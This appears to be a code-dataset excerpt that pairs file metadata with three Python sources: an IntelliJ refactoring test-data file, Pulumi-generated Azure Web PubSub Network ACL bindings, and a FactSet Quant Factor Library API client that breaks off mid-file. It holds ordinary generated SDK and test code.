| 0
| 0
| 1
| 0.040323
| false
| 0
| 0.010753
| 0
| 0.110215
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a7f96a9bc5968adcc80c257a4d10789327071e39
| 304
|
py
|
Python
|
python/testData/refactoring/inlineFunction/noReturnsAsExpressionStatement/main.after.py
|
tgodzik/intellij-community
|
f5ef4191fc30b69db945633951fb160c1cfb7b6f
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/refactoring/inlineFunction/noReturnsAsExpressionStatement/main.after.py
|
tgodzik/intellij-community
|
f5ef4191fc30b69db945633951fb160c1cfb7b6f
|
[
"Apache-2.0"
] | 2
|
2022-02-19T09:45:05.000Z
|
2022-02-27T20:32:55.000Z
|
python/testData/refactoring/inlineFunction/noReturnsAsExpressionStatement/main.after.py
|
tgodzik/intellij-community
|
f5ef4191fc30b69db945633951fb160c1cfb7b6f
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
def foo(x, y):
s = x + y
if s > 10:
print("s>10")
elif s > 5:
print("s>5")
else:
print("less")
print("over")
def bar():
s = 1 + 2
if s > 10:
print("s>10")
elif s > 5:
print("s>5")
else:
print("less")
print("over")
| 14.47619
| 21
| 0.381579
| 46
| 304
| 2.521739
| 0.347826
| 0.103448
| 0.086207
| 0.172414
| 0.827586
| 0.827586
| 0.827586
| 0.827586
| 0.827586
| 0.827586
| 0
| 0.080925
| 0.430921
| 304
| 20
| 22
| 15.2
| 0.589595
| 0
| 0
| 0.777778
| 0
| 0
| 0.098684
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0
| 0
| 0.111111
| 0.444444
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
c54aea195b8a7b7c49d6ba493b22dcbe74ae6c90
| 19,481
|
py
|
Python
|
sdk/python/pulumi_azure/webpubsub/network_acl.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/webpubsub/network_acl.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/webpubsub/network_acl.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['NetworkAclArgs', 'NetworkAcl']
@pulumi.input_type
class NetworkAclArgs:
def __init__(__self__, *,
public_network: pulumi.Input['NetworkAclPublicNetworkArgs'],
web_pubsub_id: pulumi.Input[str],
default_action: Optional[pulumi.Input[str]] = None,
private_endpoints: Optional[pulumi.Input[Sequence[pulumi.Input['NetworkAclPrivateEndpointArgs']]]] = None):
"""
The set of arguments for constructing a NetworkAcl resource.
:param pulumi.Input['NetworkAclPublicNetworkArgs'] public_network: A `public_network` block as defined below.
:param pulumi.Input[str] web_pubsub_id: The ID of the Web Pubsub service. Changing this forces a new resource to be created.
:param pulumi.Input[str] default_action: The default action to control the network access when no other rule matches. Possible values are `Allow` and `Deny`. Defaults to `Deny`.
:param pulumi.Input[Sequence[pulumi.Input['NetworkAclPrivateEndpointArgs']]] private_endpoints: A `private_endpoint` block as defined below.
"""
pulumi.set(__self__, "public_network", public_network)
pulumi.set(__self__, "web_pubsub_id", web_pubsub_id)
if default_action is not None:
pulumi.set(__self__, "default_action", default_action)
if private_endpoints is not None:
pulumi.set(__self__, "private_endpoints", private_endpoints)
@property
@pulumi.getter(name="publicNetwork")
def public_network(self) -> pulumi.Input['NetworkAclPublicNetworkArgs']:
"""
A `public_network` block as defined below.
"""
return pulumi.get(self, "public_network")
@public_network.setter
def public_network(self, value: pulumi.Input['NetworkAclPublicNetworkArgs']):
pulumi.set(self, "public_network", value)
@property
@pulumi.getter(name="webPubsubId")
def web_pubsub_id(self) -> pulumi.Input[str]:
"""
The ID of the Web Pubsub service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "web_pubsub_id")
@web_pubsub_id.setter
def web_pubsub_id(self, value: pulumi.Input[str]):
pulumi.set(self, "web_pubsub_id", value)
@property
@pulumi.getter(name="defaultAction")
def default_action(self) -> Optional[pulumi.Input[str]]:
"""
The default action to control the network access when no other rule matches. Possible values are `Allow` and `Deny`. Defaults to `Deny`.
"""
return pulumi.get(self, "default_action")
@default_action.setter
def default_action(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "default_action", value)
@property
@pulumi.getter(name="privateEndpoints")
def private_endpoints(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NetworkAclPrivateEndpointArgs']]]]:
"""
A `private_endpoint` block as defined below.
"""
return pulumi.get(self, "private_endpoints")
@private_endpoints.setter
def private_endpoints(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NetworkAclPrivateEndpointArgs']]]]):
pulumi.set(self, "private_endpoints", value)
@pulumi.input_type
class _NetworkAclState:
def __init__(__self__, *,
default_action: Optional[pulumi.Input[str]] = None,
private_endpoints: Optional[pulumi.Input[Sequence[pulumi.Input['NetworkAclPrivateEndpointArgs']]]] = None,
public_network: Optional[pulumi.Input['NetworkAclPublicNetworkArgs']] = None,
web_pubsub_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering NetworkAcl resources.
:param pulumi.Input[str] default_action: The default action to control the network access when no other rule matches. Possible values are `Allow` and `Deny`. Defaults to `Deny`.
:param pulumi.Input[Sequence[pulumi.Input['NetworkAclPrivateEndpointArgs']]] private_endpoints: A `private_endpoint` block as defined below.
:param pulumi.Input['NetworkAclPublicNetworkArgs'] public_network: A `public_network` block as defined below.
:param pulumi.Input[str] web_pubsub_id: The ID of the Web Pubsub service. Changing this forces a new resource to be created.
"""
if default_action is not None:
pulumi.set(__self__, "default_action", default_action)
if private_endpoints is not None:
pulumi.set(__self__, "private_endpoints", private_endpoints)
if public_network is not None:
pulumi.set(__self__, "public_network", public_network)
if web_pubsub_id is not None:
pulumi.set(__self__, "web_pubsub_id", web_pubsub_id)
@property
@pulumi.getter(name="defaultAction")
def default_action(self) -> Optional[pulumi.Input[str]]:
"""
The default action to control the network access when no other rule matches. Possible values are `Allow` and `Deny`. Defaults to `Deny`.
"""
return pulumi.get(self, "default_action")
@default_action.setter
def default_action(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "default_action", value)
@property
@pulumi.getter(name="privateEndpoints")
def private_endpoints(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NetworkAclPrivateEndpointArgs']]]]:
"""
A `private_endpoint` block as defined below.
"""
return pulumi.get(self, "private_endpoints")
@private_endpoints.setter
def private_endpoints(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NetworkAclPrivateEndpointArgs']]]]):
pulumi.set(self, "private_endpoints", value)
@property
@pulumi.getter(name="publicNetwork")
def public_network(self) -> Optional[pulumi.Input['NetworkAclPublicNetworkArgs']]:
"""
A `public_network` block as defined below.
"""
return pulumi.get(self, "public_network")
@public_network.setter
def public_network(self, value: Optional[pulumi.Input['NetworkAclPublicNetworkArgs']]):
pulumi.set(self, "public_network", value)
@property
@pulumi.getter(name="webPubsubId")
def web_pubsub_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Web Pubsub service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "web_pubsub_id")
@web_pubsub_id.setter
def web_pubsub_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "web_pubsub_id", value)
class NetworkAcl(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
default_action: Optional[pulumi.Input[str]] = None,
private_endpoints: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkAclPrivateEndpointArgs']]]]] = None,
public_network: Optional[pulumi.Input[pulumi.InputType['NetworkAclPublicNetworkArgs']]] = None,
web_pubsub_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages the Network ACL for a Web Pubsub.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="east us")
example_service = azure.webpubsub.Service("exampleService",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku="Standard_S1",
capacity=1)
example_virtual_network = azure.network.VirtualNetwork("exampleVirtualNetwork",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
address_spaces=["10.5.0.0/16"])
example_subnet = azure.network.Subnet("exampleSubnet",
resource_group_name=example_resource_group.name,
virtual_network_name=example_virtual_network.name,
address_prefixes=["10.5.2.0/24"],
enforce_private_link_endpoint_network_policies=True)
example_endpoint = azure.privatelink.Endpoint("exampleEndpoint",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
subnet_id=example_subnet.id,
private_service_connection=azure.privatelink.EndpointPrivateServiceConnectionArgs(
name="psc-sig-test",
is_manual_connection=False,
private_connection_resource_id=example_service.id,
subresource_names=["webpubsub"],
))
example_network_acl = azure.webpubsub.NetworkAcl("exampleNetworkAcl",
web_pubsub_id=example_service.id,
default_action="Allow",
public_network=azure.webpubsub.NetworkAclPublicNetworkArgs(
denied_request_types=["ClientConnection"],
),
private_endpoints=[azure.webpubsub.NetworkAclPrivateEndpointArgs(
id=example_endpoint.id,
denied_request_types=[
"RESTAPI",
"ClientConnection",
],
)],
            opts=pulumi.ResourceOptions(depends_on=[example_endpoint]))
```
## Import
Network ACLs for a Web Pubsub service can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:webpubsub/networkAcl:NetworkAcl example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.SignalRService/webPubSub/webpubsub1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] default_action: The default action to control the network access when no other rule matches. Possible values are `Allow` and `Deny`. Defaults to `Deny`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkAclPrivateEndpointArgs']]]] private_endpoints: A `private_endpoint` block as defined below.
:param pulumi.Input[pulumi.InputType['NetworkAclPublicNetworkArgs']] public_network: A `public_network` block as defined below.
:param pulumi.Input[str] web_pubsub_id: The ID of the Web Pubsub service. Changing this forces a new resource to be created.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: NetworkAclArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages the Network ACL for a Web Pubsub.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="east us")
example_service = azure.webpubsub.Service("exampleService",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku="Standard_S1",
capacity=1)
example_virtual_network = azure.network.VirtualNetwork("exampleVirtualNetwork",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
address_spaces=["10.5.0.0/16"])
example_subnet = azure.network.Subnet("exampleSubnet",
resource_group_name=example_resource_group.name,
virtual_network_name=example_virtual_network.name,
address_prefixes=["10.5.2.0/24"],
enforce_private_link_endpoint_network_policies=True)
example_endpoint = azure.privatelink.Endpoint("exampleEndpoint",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
subnet_id=example_subnet.id,
private_service_connection=azure.privatelink.EndpointPrivateServiceConnectionArgs(
name="psc-sig-test",
is_manual_connection=False,
private_connection_resource_id=example_service.id,
subresource_names=["webpubsub"],
))
example_network_acl = azure.webpubsub.NetworkAcl("exampleNetworkAcl",
web_pubsub_id=example_service.id,
default_action="Allow",
public_network=azure.webpubsub.NetworkAclPublicNetworkArgs(
denied_request_types=["ClientConnection"],
),
private_endpoints=[azure.webpubsub.NetworkAclPrivateEndpointArgs(
id=example_endpoint.id,
denied_request_types=[
"RESTAPI",
"ClientConnection",
],
)],
            opts=pulumi.ResourceOptions(depends_on=[example_endpoint]))
```
## Import
Network ACLs for a Web Pubsub service can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:webpubsub/networkAcl:NetworkAcl example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.SignalRService/webPubSub/webpubsub1
```
:param str resource_name: The name of the resource.
:param NetworkAclArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(NetworkAclArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
default_action: Optional[pulumi.Input[str]] = None,
private_endpoints: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkAclPrivateEndpointArgs']]]]] = None,
public_network: Optional[pulumi.Input[pulumi.InputType['NetworkAclPublicNetworkArgs']]] = None,
web_pubsub_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = NetworkAclArgs.__new__(NetworkAclArgs)
__props__.__dict__["default_action"] = default_action
__props__.__dict__["private_endpoints"] = private_endpoints
if public_network is None and not opts.urn:
raise TypeError("Missing required property 'public_network'")
__props__.__dict__["public_network"] = public_network
if web_pubsub_id is None and not opts.urn:
raise TypeError("Missing required property 'web_pubsub_id'")
__props__.__dict__["web_pubsub_id"] = web_pubsub_id
super(NetworkAcl, __self__).__init__(
'azure:webpubsub/networkAcl:NetworkAcl',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
default_action: Optional[pulumi.Input[str]] = None,
private_endpoints: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkAclPrivateEndpointArgs']]]]] = None,
public_network: Optional[pulumi.Input[pulumi.InputType['NetworkAclPublicNetworkArgs']]] = None,
web_pubsub_id: Optional[pulumi.Input[str]] = None) -> 'NetworkAcl':
"""
Get an existing NetworkAcl resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] default_action: The default action to control the network access when no other rule matches. Possible values are `Allow` and `Deny`. Defaults to `Deny`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkAclPrivateEndpointArgs']]]] private_endpoints: A `private_endpoint` block as defined below.
:param pulumi.Input[pulumi.InputType['NetworkAclPublicNetworkArgs']] public_network: A `public_network` block as defined below.
:param pulumi.Input[str] web_pubsub_id: The ID of the Web Pubsub service. Changing this forces a new resource to be created.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _NetworkAclState.__new__(_NetworkAclState)
__props__.__dict__["default_action"] = default_action
__props__.__dict__["private_endpoints"] = private_endpoints
__props__.__dict__["public_network"] = public_network
__props__.__dict__["web_pubsub_id"] = web_pubsub_id
return NetworkAcl(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="defaultAction")
def default_action(self) -> pulumi.Output[Optional[str]]:
"""
The default action to control the network access when no other rule matches. Possible values are `Allow` and `Deny`. Defaults to `Deny`.
"""
return pulumi.get(self, "default_action")
@property
@pulumi.getter(name="privateEndpoints")
def private_endpoints(self) -> pulumi.Output[Optional[Sequence['outputs.NetworkAclPrivateEndpoint']]]:
"""
A `private_endpoint` block as defined below.
"""
return pulumi.get(self, "private_endpoints")
@property
@pulumi.getter(name="publicNetwork")
def public_network(self) -> pulumi.Output['outputs.NetworkAclPublicNetwork']:
"""
A `public_network` block as defined below.
"""
return pulumi.get(self, "public_network")
@property
@pulumi.getter(name="webPubsubId")
def web_pubsub_id(self) -> pulumi.Output[str]:
"""
The ID of the Web Pubsub service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "web_pubsub_id")
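# Editorial sketch (not part of the generated file): adopting an existing Network
# ACL through the static `get` method above. The resource ID follows the format in
# the Import section of the class docstring; all identifiers are placeholders.
#
#   existing = NetworkAcl.get(
#       "existingNetworkAcl",
#       id="/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.SignalRService/webPubSub/webpubsub1")
#   pulumi.export("defaultAction", existing.default_action)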
[record metadata: code/python/FactSetQuantFactorLibrary/v1/fds/sdk/FactSetQuantFactorLibrary/api/helper_api.py — repo factset/enterprise-sdk — hexsha c55e9a96c356ceb08a9adbd64c4f6d7507461fc7 — license Apache-2.0 — lang Python — size 65,327 bytes]
"""
FactSet Quant Factor Library API
    The FactSet Quant Factor Library (QFL) API helps to detect investment themes across global equity markets, incorporate ideas into your portfolio construction process, and transform raw data into actionable intelligence. Over 2,000 items spanning Factor Groups in: * Classification and Reference Data - Asset Data, Country, Industry, and Size * Market - Liquidity, Market Sensitivity, Momentum, Technical, Volatility * Core Fundamentals - Efficiency, Growth, Management, Profitability, Quality, Solvency, Value * Macro and Cross Asset - Commodity, FX Sensitivity, Debt, Economic * Alternative - Analyst Sentiment, Corporate Governance, Crowding, Insider Activity. # noqa: E501
The version of the OpenAPI document: 1.0.0
Contact: api@factset.com
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from multiprocessing.pool import ApplyResult
import typing
from fds.sdk.FactSetQuantFactorLibrary.api_client import ApiClient, Endpoint as _Endpoint
from fds.sdk.FactSetQuantFactorLibrary.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from fds.sdk.FactSetQuantFactorLibrary.exceptions import ApiException
from fds.sdk.FactSetQuantFactorLibrary.model.library_request import LibraryRequest
from fds.sdk.FactSetQuantFactorLibrary.model.library_response import LibraryResponse
class HelperApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
self.get_factor_library_endpoint = _Endpoint(
settings={
'response_type': (
{ 200: (LibraryResponse,), },
None
),
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/factset-quant-factor-library/v1/library',
'operation_id': 'get_factor_library',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'factors',
'factor_groups',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
'factors',
'factor_groups',
]
},
root_map={
'validations': {
('factors',): {
'max_items': 20,
'min_items': 1,
},
('factor_groups',): {
'max_items': 5,
'min_items': 1,
},
},
'allowed_values': {
},
'openapi_types': {
'factors':
([str],),
'factor_groups':
([str],),
},
'attribute_map': {
'factors': 'factors',
'factor_groups': 'factorGroups',
},
'location_map': {
'factors': 'query',
'factor_groups': 'query',
},
'collection_format_map': {
'factors': 'csv',
'factor_groups': 'csv',
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.get_factor_library_list_endpoint = _Endpoint(
settings={
'response_type': (
{ 200: (LibraryResponse,), },
None
),
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/factset-quant-factor-library/v1/library',
'operation_id': 'get_factor_library_list',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'library_request',
],
'required': [
'library_request',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'library_request':
(LibraryRequest,),
},
'attribute_map': {
},
'location_map': {
'library_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
@staticmethod
def apply_kwargs_defaults(kwargs, return_http_data_only, async_req):
kwargs["async_req"] = async_req
kwargs["_return_http_data_only"] = return_http_data_only
kwargs["_preload_content"] = kwargs.get("_preload_content", True)
kwargs["_request_timeout"] = kwargs.get("_request_timeout", None)
kwargs["_check_input_type"] = kwargs.get("_check_input_type", True)
kwargs["_check_return_type"] = kwargs.get("_check_return_type", True)
kwargs["_spec_property_naming"] = kwargs.get("_spec_property_naming", False)
kwargs["_content_type"] = kwargs.get("_content_type")
kwargs["_host_index"] = kwargs.get("_host_index")
def get_factor_library(
self,
**kwargs
) -> LibraryResponse:
"""Retrieve a list of all available factors with relevant meta data. # noqa: E501
Fetch the list of all available factors and related meta data. # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Keyword Args:
            factors ([str]): Array of individual Factor Items requested for the library endpoint. Use the factorGroups parameter to pull a full list of factors based on the input group. [optional]
            factor_groups ([str]): Fetch a collection of Factors that fall within one of the below \"groups\". For example, requesting factorGroup=Momentum will return all factors under the momentum group. To know which items are available in each group use the /library endpoint. ***factor groups limit** = 5 factor groups per request* ### Classification and Reference |Group|Descriptions| |---|---| |Asset_Data|Easily input security-level metadata into your quantitative research process. Common metrics used include Days Since Report, Days to Report, ADR Flag, and Minimum Lot Size. Integrate variables from FactSet Reference, FactSet Fundamentals, and FactSet Estimates databases to impose portfolio constraints and access general reference data.| |Country|Evaluate securities based on the countries in which they have the highest exposure. Analyze company-level exposures across various countries and measure how concentrated a firm’s business is within their countries of operation. Metrics are derived from FactSet Reference and FactSet Geographic Revenue Exposure (GeoRev) databases and include Country Exposure, Country of Incorporation, and Country of Risk.| |Industry|Classify securities based on the industries in which they generate the majority of their revenues. Incorporate variables from the FactSet Revere Business and Industry Classification System (RBICS) database to measure how concentrated a firm’s business is within the industries they operate and across various sub-sectors. Common metrics include Industry Classifications, Industry Exposures, and Industry Concentration.| |Size|Assess how large or small a company is relative to industry peers. Create size buckets and clarify the systematic portion of company returns using variables from FactSet Prices, FactSet RBICS, FactSet Fundamentals, and FactSet Estimates. Common metrics include Size Classification, Enterprise Value, and Market Share.| ### Market Factors |Group|Descriptions| |---|---| |Liquidity|Assess how investible a security is, as well as the potential market impact of a trade using signals built off pricing and volume data from FactSet Prices. Integrate factors as components into your alpha models to evaluate systematic risk or input them into your portfolio construction models to dictate how much of an asset can be bought or sold based on liquidity levels. Common metrics include Average Dollars Traded, Share Turnover, and Bid Ask Spread.| |Market Sensitivity|Clarify the common variations in stock returns attributable to the performance of their local market indices. Leverage regressions performed between security-level and market-index returns across different return horizons and methodologies. Metrics are derived from FactSet Prices and include Beta R-Squared, Up Market Beta, and Down Market Beta.| |Momentum|Analyze the historical momentum of a security and uncover how each underlying data item, calculation, and horizon can be meaningful in different situations. Metrics are derived from FactSet Prices and include 52W Position, Return Momentum, and Velocity.| |Technical|Forecast the direction of future price movements based on historical market data and leverage heuristic or pattern-based signals from FactSet Prices. Common metrics include Average True Range, Ulcer Performance Index, and Money Flow Volume.| |Volatility|Measure the uncertainty in asset price movements with indicators from the FactSet Prices database. Capture various forms of uncertainty by employing statistical calculations on security performance data. 
Common metrics include Return Volatility, Semivariance, and Turbulence.| ### Core Fundamentals |Group|Descriptions| |---|---| |Efficiency|Leverage core financial data to determine how effectively a company uses its assets, collects payments, and operates its business. Most variables are measured as turnover ratios and include changes over time to provide transparency into the efficiency of each business process. Metrics are derived from FactSet Fundamentals and FactSet Estimates and include Asset Turnover, Receivables Turnover, and Cash Conversion Cycle.| |Growth|Measure a company’s ability to grow faster than its peers. Compare the future expected growth of a company with its historical growth and view growth rates adjusted for stability. Integrate variables from FactSet RBICS, FactSet Fundamentals, and FactSet Estimates to analyze growth rates over multiple horizons including Market Share, Sales, and EPS Growth.| |Management|Gain insight into how management finances their business and the decisions they make that impact the core financial statements. These choices are reflected in changes to total debt or equity, the overall size of the balance sheet, and decisions around the accounting methods used. Metrics are derived from FactSet Fundamentals and FactSet Estimates and include Capital Expenditures (CAPEX) Growth, Equity Buyback Ratio, and Depreciation & Amortization Variability.| |Profitability|Evaluate a company’s ability to generate income relative to its revenue or balance sheet metrics. Identify lucrative businesses relative to their industry, region, and size profile. Metrics are derived from FactSet Fundamentals and FactSet Estimates and include Return on Assets, Return on Invested Capital Change, and Return on Total Equity.| |Quality|Understand the overall financial health and quality of a company’s business. Use historical data from FactSet Fundamentals to analyze balance sheet health, stability of earnings and profit margins, variability in cash flows, and trends that look beyond headline financial metrics. Common metrics include Cash Earnings Ratio Variability, Revenue Stability, and Accruals Ratios. Composite quality scores (i.e., the Piotroski F-Score, Beneish M-Score, and Altman Z-Score) and their underlying components are also available as individual metrics.| |Solvency|Measure a company’s ability to meet their short- and long-term financial obligations and determine the degree of leverage employed to run their business. Incorporate financial ratios from FactSet Fundamentals and FactSet Estimates to quantify liability or debt obligation relative to earnings, cash flows, equities, or items from the asset side of the balance sheet. Common metrics include Current Ratio, Current Asset Liquidity, and Debt to Equity Change.| |Value|Quickly determine how cheap or expensive a company is based on common security-level characteristics from FactSet Prices, FactSet Fundamentals, and FactSet Estimates. Apply factors as an intersection between other factors for a more customized analysis, such as finding the cheapest stocks among the highest quality companies. Common metrics include Earnings Yield, Book to Price, and Revenue to Enterprise Value.| ### Macro and Cross-Asset |Group|Descriptions| |---|---| |Commodity|Quantify the impact movements in the commodity markets have on equity prices. 
Metrics are derived from FactSet Prices and allow you to measure company-level exposure to commodities such as Gold, Crude Oil, Coffee, and Live Cattle.| |FX_Sensitivity|Analyze security-level sensitivity to fluctuations in the currency markets. Metrics are derived from FactSet Prices and allow you to identify company exposures to currencies such as USD, EUR, JPY, and CNY.| |Debt|Uncover details related to company debt through issuer-level factor exposures. Use the FactSet Fixed Income Prices & Derived Analytics database to aggregate metrics at the company level. Common metrics include Effective Duration, Option Adjusted Spread, and Yield to Worst.| |Economic|Capture daily security exposures to leading economic indicator forecasts. Leverage the Quant Factor Library’s detailed country exposure model to attribute economic measures to individual companies. Metrics are derived from FactSet Economic Estimates and include Real GDP Growth, Industrial Production Growth, Core CPI Inflation, and Policy Rates.| ### Alternative |Group|Descriptions| |---|---| |Analyst_Sentiment|Analyze a security’s outlook from the perspective of a sell-side research analyst. Leverage consensus estimates data from the FactSet Estimates database to analyze the directional change in estimate revisions for various financial statement items and time periods. Common metrics include Sales Estimate Revisions, Free Cash Flow Estimate Revisions, and Robust Estimate Revisions.| |Corporate_Governance|Identify companies with strong corporate governance. Analyze the profile of a company’s management and board based on tenure, diversity, compensation incentives, and more factors from the FactSet People database. Common metrics include Management - Average Age, Board - Activist Member, and Executives - Average Bonus.| |Crowding|Understand the degree to which investors own, purchase, or sell a security. View characteristics of each investor’s profile and characterize crowding from passive, active, institutional, ETF, and hedge fund investors. Use metrics from FactSet Ownership, FactSet Prices, and FactSet Fundamentals to help identify potential effects of crowding such as whether certain investor types are acquiring or divesting from a given security. Common metrics include Active Buyer Percent of Portfolio Change, ETF Days to Liquidate, and Hedge Fund Percent Outstanding.| |Insider_Activity|Measure the degree to which insiders own, purchase, or sell their company’s stock. Analyze the sentiment of those with access to material non-public information or determine how the amount of insider ownership may impact management’s key business decisions. Metrics are derived from FactSet Ownership and include Insider Percent Outstanding, Insider Number of Buys, and Insider Seller Position Change.| |ESG|Analyze Environmental, Social and Governance (ESG) behavior, which is aggregated and categorized into continuously updated, material ESG scores to uncover risks and opportunities from companies. Truvalue Labs focuses on company ESG behavior from external sources and includes both positive and negative events that go beyond traditional sources of ESG risk data. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
LibraryResponse
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
return self.get_factor_library_endpoint.call_with_http_info(**kwargs)
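    # Editorial usage sketch (not generated code; assumes valid FactSet credentials —
    # the factor group name comes from the docstring above, all other values are
    # placeholders):
    #
    #   from fds.sdk.FactSetQuantFactorLibrary import ApiClient, Configuration
    #   with ApiClient(Configuration(username="USER", password="API_KEY")) as client:
    #       api = HelperApi(client)
    #       response = api.get_factor_library(factor_groups=["Momentum"])
    #       print(response)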
def get_factor_library_with_http_info(
self,
**kwargs
